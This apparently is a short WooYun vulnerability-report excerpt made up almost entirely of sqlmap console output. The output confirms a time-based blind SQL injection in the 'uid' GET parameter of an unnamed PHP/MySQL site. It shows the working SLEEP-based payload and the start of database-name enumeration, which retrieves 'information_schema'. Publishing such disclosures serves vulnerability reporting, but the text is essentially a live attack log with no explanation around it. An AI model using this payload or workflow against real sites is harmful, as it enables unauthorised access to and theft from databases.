WooYun.org

GET parameter 'uid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 801 HTTP(s) req
uests:
---
Parameter: uid (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: action=member&opt=album&page=2&uid=1 AND (SELECT * FROM (SELECT(SLE
EP(5)))wZyz)
---
[14:00:24] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0.12
[14:00:24] [INFO] fetching database names
[14:00:24] [INFO] fetching number of databases
[14:00:24] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[14:00:24] [INFO] retrieved:
[14:00:24] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[14:01:13] [INFO] adjusting time delay to 3 seconds due to good response times
5
[14:01:21] [INFO] retrieved: information_sc
[14:07:56] [ERROR] invalid character detected. retrying..
[14:07:56] [WARNING] increasing time delay to 4 seconds
hema